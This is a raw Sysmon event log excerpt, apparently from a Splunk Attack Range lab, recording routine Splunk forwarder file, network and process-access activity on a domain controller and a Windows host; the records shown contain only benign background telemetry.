23542300x8000000000000000294017Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:40.118{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3553803C40D5C0AEAE9C4D57117EA68,SHA256=42E70F86D69284D94C57D38AC91A4742592EC5C3A2F75CD73B283E656B38B74E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218343Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:37.508{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51456-false10.0.1.12-8000- 23542300x8000000000000000218342Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:40.106{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=293051ECB84D3F880A40879FAB39B362,SHA256=2AB0D61E983BF909E706AFC7583DF9688E1620EEC82ADAC4FC8BF3F8B85D09D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294016Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:40.103{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294019Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:39.554{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53854-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000294018Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:41.119{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04736AB8E7C226D676CEDB16FCA5DD83,SHA256=BCB6B7D1E8E9DA1DF89FFACEBB726ED267B06AE23352CDDBA4CEE439657DE69C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218344Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:41.138{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C87D5853BC68FF9880446126468881FE,SHA256=B0A15644E23E7EDBF62B554BC331DFD674FE283C8CBDE38E807F57E897D94148,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218345Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:42.325{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6464ACE1A944589366C6C2F71B6310F,SHA256=EB2766C18F4F16EB28C8365AADC58659045A57A26A9395FDEDCD6D166A525078,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294021Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:40.577{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53855-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294020Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:42.134{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F96610B15E186C7E6A40549E4C1EA072,SHA256=C317F48BF5439665457D1415D3EC6E45EB23D03EA815715B80D92BB825833843,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218346Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:43.341{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BDE8D9A97B39108F2312C95C6959DE9,SHA256=092553A827C217EFE9EDBD68E4BF0401D4201DF31EAB93183F08F0A3391EDF9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294022Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:43.165{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9D92937FB46D2510616CE800C085E52,SHA256=4CD0EC271AE9A0CE1D2DE899B8984CF2A817B68073C5642AED25C0A0B78EF519,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218360Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:44.747{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-13DC-6216-9F04-000000003902}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218359Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:44.747{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218358Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:44.747{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218357Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:44.747{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218356Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:44.747{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218355Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:44.747{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218354Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:44.747{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218353Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:44.747{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218352Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:44.747{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218351Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:44.747{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218350Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:44.747{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-13DC-6216-9F04-000000003902}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218349Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:44.747{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-13DC-6216-9F04-000000003902}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218348Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:44.748{4F8D34B0-13DC-6216-9F04-000000003902}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218347Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:44.356{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAB2315B8B59690867BC941590877B73,SHA256=E9B25DB098453AA401B936AFE7EC40B4C810A6AD3FF720C820476EE8F863ABD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294023Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:44.185{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2545496C43F7491ED6190BD70089C7A4,SHA256=28591F7A1E90FA0E0873095BA389F902DC9F1C4484CA42221BE8C97EB62EFD6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294024Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:45.202{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C61FB40737B4F1C8D00B52CE518654FA,SHA256=445EC9D2DD4084E54A5C9C603A7A02A8063169A9224A38091D5B4340AA67653F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218378Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:42.711{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51457-false10.0.1.12-8000- 23542300x8000000000000000218377Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:45.778{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8BAE34B7C7638822D37697EC01A1B3C3,SHA256=9BEE40772AF1FF0F3F3DBB5B06EC1625D749A21D658CBFCD3EA8F3F5650F6206,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218376Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:45.778{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E21DB610F17180F367FDB24A6FB26779,SHA256=31448CA3821C2F80D8E554E854174938391F58DB1E0D4348B1CED516221E23A1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218375Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:45.637{4F8D34B0-13DD-6216-A004-000000003902}32684036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218374Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:45.419{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-13DD-6216-A004-000000003902}3268C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218373Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:45.419{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218372Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:45.419{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218371Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 